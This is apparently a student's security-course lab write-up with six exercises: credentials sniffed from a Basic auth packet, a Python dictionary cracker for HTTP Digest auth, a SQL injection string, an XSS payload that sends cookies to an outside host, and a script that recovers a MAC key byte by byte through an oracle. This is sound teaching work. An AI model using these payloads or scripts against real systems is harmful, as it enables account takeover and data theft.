aboutsummaryrefslogtreecommitdiffstats
path: root/OLD/csci5271/ho2/writeup.md
blob: ea63dd35771b6461b02742e8e3f151e98cc1136c (plain) (blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
# 1

## Packet

```
IP 192.168.14.3.46826 > 192.168.14.1.80: Flags [P.], seq 1:143, ack 1, win 502, options [nop,nop,TS val 1452909150 ecr 2428281190], length 142: HTTP: GET /secret/file HTTP/1.1
E.....@.@..............P.Tw.|..j...........
V..^...fGET /secret/file HTTP/1.1
Host: 192.168.14.1
Authorization: Basic dHJhdmlzMTQ6bWFpdkRlY2d1cjIyMDI=
User-Agent: curl/7.58.0
Accept: */*
```

## User/Pass
`travis14:maivDecgur2202`

## Contents

```html
I'm going to let you in on a little secret. Every day, once a day, give yourself a present. Don’t plan it; don’t wait for it; just let it happen.
- Dale Cooper
```

# 2
## Packet

```
182203 IP 192.168.14.2.36586 > 192.168.14.1.80: Flags [P.], seq 91:464, ack 308, win 501, options [nop,nop,TS val 422351445 ecr 1957960104], length 373: HTTP: HEAD /secret/cheese HTTP/1.1
E.....@.@..v...........P,..................
.,.Ut...HEAD /secret/cheese HTTP/1.1
Host: 192.168.14.1
Authorization: Digest username="travis14", realm="Cheese", nonce="/DPYEFbSBQA=c06893026441a70acf049b49540e97acd2bdd640", uri="/secret/cheese", cnonce="ZjdlNTk0ZGZmMDQwZTU3OTM2MTIxOGEyNzljNDJlYzc=", nc=00000001, qop=auth, response="872aafc461761e417d2df47b85e43d2b", algorithm="MD5"
User-Agent: curl/7.58.0
Accept: */*
```

## Crack

```python
# HTTP Digest Authentication cracker
import hashlib

username = "travis14"
realm = "Cheese"
nonce = "/DPYEFbSBQA=c06893026441a70acf049b49540e97acd2bdd640"
uri = "/secret/cheese"
qop = "auth"
nc = "00000001"
cnonce = "ZjdlNTk0ZGZmMDQwZTU3OTM2MTIxOGEyNzljNDJlYzc="
response = "872aafc461761e417d2df47b85e43d2b"

# Calculate the response
with open("10k-most-common.txt") as f:
    for line in f:
        line = line.strip('\n').strip()
        ha1 = hashlib.md5((username + ":" + realm + ":" + line).encode('utf-8')).hexdigest()
        ha2 = hashlib.md5(("HEAD" + ":" + uri).encode('utf-8')).hexdigest()
        response = hashlib.md5((ha1 + ":" + nonce + ":" + nc + ":" + cnonce + ":" + qop + ":" + ha2).encode('utf-8')).hexdigest()
        # print(line + ":" + response)
        if (response == "872aafc461761e417d2df47b85e43d2b"):
            print("Password: " + line)
            break

```
## Password

`Password: domain`

## Contents

```
Intelligence alone is not nearly enough when it comes to acting wisely.

— Fyodor Dostoevsky
```

# 3

## Cookie

`Stephen2019-11-03T12%3A44%3A21Z`

# 4

The secret to figuring out the SQL injection was ~~trying everything~~ tuning the query to stop returning Error 500.

## Request

`picture=char-kway-teow.jpg'+OR+1=1+AND'user=alice--`

## Response

`The best char kway teow is Penang char kway teow (lat: 5.411135 / lng: 100.330462)`

# 5


## XSS

```html
<script>document.location="http://192.168.14.3:8080/?cookie="+document.cookie;</script>
```

## Cookie
`GET /?cookie=auth=Iwillseeyouagainin32years. HTTP/1.1" 200 -`

## Writeup
The main additional thing I did was start up a `SimpleHTTPServer` on port 8080 of the server I have SSH access to. The attack works because the server is making an HTTP request to that port with the cookie being that of the browser.

# 6
## Code
```python
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import string

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

actual = ""
key = "Z"*19
for n in range(19, -1, -1):
    res2 = requests.get("https://192.168.14.1/mac-cookie?username="+key,
                        verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
    for c in string.printable:
        test = key[:n] + c
        res1 = requests.get("https://192.168.14.1/mac-cookie?username="+test,
                            verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
        #print(test, res1, res2)
        if res1 == res2:
            actual = c + actual
            break
    key = key[:-1]

print("Key is", actual)
```

## Key
`###################k`